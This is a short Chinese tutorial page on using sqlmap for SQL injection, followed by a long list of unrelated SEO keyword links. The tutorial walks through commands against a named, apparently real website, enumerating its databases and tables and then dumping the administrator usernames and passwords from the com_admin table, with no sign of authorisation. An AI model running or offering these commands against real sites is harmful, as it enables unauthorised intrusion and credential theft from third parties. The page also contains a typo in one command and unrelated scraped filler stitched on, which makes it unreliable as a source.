sqlmap的使用
发表于:2025-02-01 作者:千家信息网编辑
千家信息网最后更新 2025年02月01日,用sqlmap进行注入1、用扫描工具可以扫出注入点这里我用一个注入点进行说明。sqlamp.py -u "http://www.gaoneng.com/product.php?cid=71"可以看出此
千家信息网最后更新 2025年02月01日sqlmap的使用
用sqlmap进行注入
1、用扫描工具可以扫出注入点这里我用一个注入点进行说明。
sqlamp.py -u "http://www.gaoneng.com/product.php?cid=71"
可以看出此处存在sql注入漏洞。
2、
sqlmap.py -u "http://www.gaoneng.com/product.php?cid=71"
--dbs 可以跑出存在的数据库名
然后可以跑gaoneng数据库中的表
Sqlmap.py -u"http://www.gaoneng.com/product.php?cid=71" -D gaoneng --tables
既然已经爆出数据库里的表,那就可以爆出表中的字段
Sqlmap.py -u "http://www.gaoneng.com/product.php?cid=71"
-D gaoneng -T com_admin --columns
可以看到这个表中存在我们需要的字段,密码与用户名
Sqlmap.py -u "http://www.gaoneng.com/product.php?cid=71"
-D gaoneng -T com_admin -C username,password --dump
由此这个网站的管理员密码与用户名已被完全爆出。
数据
数据库
字段
密码
用户
用户名
工具
扫描工具
漏洞
由此
管理员
网站
管理
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
苏州通用软件开发用途
网络安全感想30字
网络安全法实施相关问题研究
微软设置密钥管理服务器
软件开发派遣
计算机网络安全检测技术论坛
第三章 计算机网络技术
局网怎么访问服务器
烽火革命数据库
华为服务器斗罗大陆
阿里云服务器 不稳定
兆芯中国移动服务器
软件开发能力测评维度
云端服务软件开发
什么是216网络安全色
做么地方能恢复手机数据库
苹果手机怎么快速改数据库
手游墨斗哪个服务器好
服务器型号功率一般多大
苹果网络技术支持
网络安全第59条规定是什么
网络安全绘画作品展
美国国土安全部承认使用数据库
php脚本创建数据库表
互联网彩票软件开发是否合法
数据库关键字自动显示
开展网络安全风险评估排查
软件开发13寸笔记本推荐
阿里邮箱上传图片服务器认证失败
饥荒只有服务器模组
